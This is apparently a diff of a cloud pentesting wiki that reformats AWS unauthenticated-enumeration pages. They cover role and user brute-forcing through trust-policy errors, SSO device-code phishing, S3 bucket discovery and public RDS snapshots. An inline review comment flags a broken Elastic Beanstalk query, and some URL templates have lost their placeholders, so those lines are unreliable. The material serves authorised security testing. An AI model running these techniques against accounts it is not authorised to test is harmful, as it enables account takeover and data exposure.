+aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
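Review bot: The "Enumerate Public Environments" query filters on `Environments[?OptionSettings[...]]`, but `describe-environments` does not return `OptionSettings` (those come from `describe-configuration-settings`), so the expression selects nothing on every account. If the goal is to list reachable endpoints, `aws elasticbeanstalk describe-environments --query 'Environments[].{Name:EnvironmentName,App:ApplicationName,CNAME:CNAME,URL:EndpointURL}' --output table` returns the environment CNAMEs directly, and whether one is internet-facing is then read from the `Scheme` field of `aws elbv2 describe-load-balancers`. The URL template `https://-env..elasticbeanstalk.com/` has lost its application and region placeholders (probably stripped in conversion), and "Metadatav1" should read IMDSv1 so readers connect it to the SSRF material elsewhere in the book.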
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md new file mode 100644 index 000000000..73c113dca --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md @@ -0,0 +1,12 @@ +# AWS - Elasticsearch Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +https://vpc-{user_provided}-[random].[region].es.amazonaws.com +https://search-{user_provided}-[random].[region].es.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md similarity index 50% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md index 04863b285..8bc9c4bf0 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md @@ -1,33 +1,19 @@ # AWS - IAM & STS Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Enumerate Roles & Usernames in an account ### ~~Assume Role Brute-Force~~ -{% hint style="danger" %} -**This technique doesn't work** anymore as if the role exists or not you always get this error: - -`An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` - -You can **test this running**: - -`aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` -{% endhint %} +> [!CAUTION] +> **This technique doesn't work** anymore as if the role exists or not you always get this error: +> +> `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` +> +> You can **test this running**: +> +> `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return: 
@@ -49,26 +35,24 @@ You can use this [script to enumerate potential principals](https://github.com/R Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided. -{% hint style="warning" %} -Note that in that resource you could specify a cross account role or user: - -* `arn:aws:iam::acc_id:role/role_name` -* `arn:aws:iam::acc_id:user/user_name` -{% endhint %} +> [!WARNING] +> Note that in that resource you could specify a cross account role or user: +> +> - `arn:aws:iam::acc_id:role/role_name` +> - `arn:aws:iam::acc_id:user/user_name` This is a policy example: ```json { - "Version":"2012-10-17", - "Statement":[ + "Version": "2012-10-17", + "Statement": [ { - "Effect":"Allow", - "Principal": - { - "AWS":"arn:aws:iam::216825089941:role\/Test" + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::216825089941:role/Test" }, - "Action":"sts:AssumeRole" + "Action": "sts:AssumeRole" } ] } @@ -78,7 +62,7 @@ This is a policy example: That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating) -![](<../../../.gitbook/assets/image (153).png>) +![](<../../../images/image (153).png>) #### CLI 
@@ -115,15 +99,15 @@ aws iam create-role --role-name Test-Role2 --assume-role-policy-document file:// An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2" ``` -You can automate this process with [https://github.com/carlospolop/aws\_tools](https://github.com/carlospolop/aws_tools) +You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) -* `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` +- `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu): -* `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -* `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -* The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration +- `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` +- `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` +- The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration ### Privesc @@ -131,16 +115,16 @@ In the case the role was bad configured an allows anyone to assume it: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "sts:AssumeRole" + } + ] } ``` 
@@ -153,21 +137,21 @@ This trust might give access to a role with the following **trust policy**: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" } - ] + } + } + ] } ``` @@ -182,24 +166,11 @@ Another potential misconfiguration is to **add a condition** like the following: } ``` -Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org\_name1** and **assume the role** from a Github Action. +Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action. ## References -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) -* [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) +- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +- [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md index fc17e635b..192876460 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md @@ -1,19 +1,6 @@ # AWS - Identity Center & SSO Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## AWS Device Code Phishing @@ -21,8 +8,8 @@ Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing In order to perform this attack the requisites are: -* The victim needs to use **Identity Center** -* The attacker must know the **subdomain** used by the victim `.awsapps.com/start` +- The victim needs to use **Identity Center** +- The attacker must know the **subdomain** used by the victim `.awsapps.com/start` Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account. @@ -76,7 +63,7 @@ Send the generated link to the victim using you awesome social engineering skill If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\ This is how the promp looks nowadays: -
+
4. **Get SSO access token** @@ -131,27 +118,14 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217 ### Automatic Tools -* [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) -* [https://github.com/sebastian-mora/awsssome\_phish](https://github.com/sebastian-mora/awsssome_phish) +- [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) +- [https://github.com/sebastian-mora/awsssome_phish](https://github.com/sebastian-mora/awsssome_phish) ## References -* [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) -* [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) -* [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html) -* [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) +- [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) +- [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) +- [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html) +- [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md new file mode 100644 index 000000000..2bc784c6b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md @@ -0,0 +1,13 @@ +# AWS - IoT Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +mqtt://{random_id}.iot.{region}.amazonaws.com:8883 +https://{random_id}.iot.{region}.amazonaws.com:8443 +https://{random_id}.iot.{region}.amazonaws.com:443 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md new file mode 100644 index 000000000..867126bbd --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md @@ -0,0 +1,11 @@ +# AWS - Kinesis Video Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +https://{random_id}.kinesisvideo.{region}.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md new file mode 100644 index 000000000..a39d47c39 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md 
@@ -0,0 +1,22 @@
+# AWS - Lambda Unauthenticated Access
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Public Function URL
+
+It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities.
+
+### Public URL template
+
+```
+https://{random_id}.lambda-url.{region}.on.aws/
+```
+
+### Get Account ID from public Lambda URL
+
+Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
+This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
+
+You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
new file mode 100644
index 000000000..b15f112d5
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md
@@ -0,0 +1,13 @@
+# AWS - Media Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### Public URL template
+
+```
+https://{random_id}.mediaconvert.{region}.amazonaws.com
+https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
+https://{random_id}.data.mediastore.{region}.amazonaws.com
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
new file mode 100644
index 000000000..5187644a2
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
@@ -0,0 +1,22 @@
+# AWS - MQ Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Public Port
+
+### **RabbitMQ**
+
+In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/`
+
+### ActiveMQ
+
+In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access.
+
+### Public URL template
+
+```
+https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/
+ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
new file mode 100644
index 000000000..94ccbb070
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md
@@ -0,0 +1,18 @@
+# AWS - MSK Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### Public Port
+
+It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured).
+
+It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet.
+
+### Public URL template
+
+```
+b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
+{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
new file mode 100644
index 000000000..a4ff8039b
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md
@@ -0,0 +1,44 @@
+# AWS - RDS Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## RDS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-relational-database-rds-enum.md
+{{#endref}}
+
+## Public Port
+
+It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database.
+
+## Public RDS Snapshots
+
+AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account:
+
+```bash
+# Public RDS snapshots
+aws rds describe-db-snapshots --include-public
+
+## Search by account ID
+aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]'
+## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted)
+## To share a RDS encrypted snapshot you need to share the KMS key also with the account
+
+
+# From the own account you can check if there is any public snapshot with:
+aws rds describe-db-snapshots --snapshot-type public [--region us-west-2]
+## Even if in the console appear as there are public snapshot it might be public
+## snapshots from other accounts used by the current account
+```
+
+### Public URL template
+
+```
+mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
+postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
new file mode 100644
index 000000000..3503a91a7
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md
@@ -0,0 +1,11 @@ +# AWS - Redshift Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +{user_provided}...redshift.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md similarity index 68% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md index ec6530ee8..f78886c5d 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md @@ -1,19 +1,6 @@ # AWS - S3 Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 Public Buckets 
@@ -29,33 +16,34 @@ Different methods to find when a webpage is using AWS to storage some resources: #### Enumeration & OSINT: -* Using **wappalyzer** browser plugin -* Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. -* **Check for resources** in domains like: +- Using **wappalyzer** browser plugin +- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. +- **Check for resources** in domains like: - ``` - http://s3.amazonaws.com/[bucket_name]/ - http://[bucket_name].s3.amazonaws.com/ - ``` -* Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` -* Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. -* The **bucket name** and the **bucket domain name** needs to be **the same.** - * **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. - * To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). + ``` + http://s3.amazonaws.com/[bucket_name]/ + http://[bucket_name].s3.amazonaws.com/ + ``` + +- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` +- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. +- The **bucket name** and the **bucket domain name** needs to be **the same.** + - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. 
+ - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). #### Brute-Force You can find buckets by **brute-forcing name**s related to the company you are pentesting: -* [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) -* [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) -* [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) -* [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) -* [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) -* [https://github.com/tomdev/teh\_s3\_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) -* [https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3) -* [https://github.com/Eilonh/s3crets\_scanner](https://github.com/Eilonh/s3crets_scanner) -* [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) +- [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) +- [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) +- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) +- [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) +- [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) +- [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) +- 
[https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3) +- [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner) +- [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter)
# Generate a wordlist to create permutations
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
@@ -117,7 +105,7 @@ or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com`
 
 If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**:
 
-![](<../../../.gitbook/assets/image (106).png>)
+![](<../../../images/image (106).png>)
 
 ### Enumerating the bucket
 
@@ -125,18 +113,18 @@ To test the openness of the bucket a user can just enter the URL in their web br
 
 Open to everyone:
 
-![](<../../../.gitbook/assets/image (201).png>)
+![](<../../../images/image (201).png>)
 
 Private:
 
-![](<../../../.gitbook/assets/image (83).png>)
+![](<../../../images/image (83).png>)
 
 You can also check this with the cli:
 
 ```bash
 #Use --no-sign-request for check Everyones permissions
 #Use --profile  to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
-#--recursive if you want list recursivelyls 
+#--recursive if you want list recursivelyls
 #Opcionally you can select the region if you now it
 aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2]
 ```
@@ -209,20 +197,7 @@ s3_client.put_bucket_acl(
 
 ## References
 
-* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
-* [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
+- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+- [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
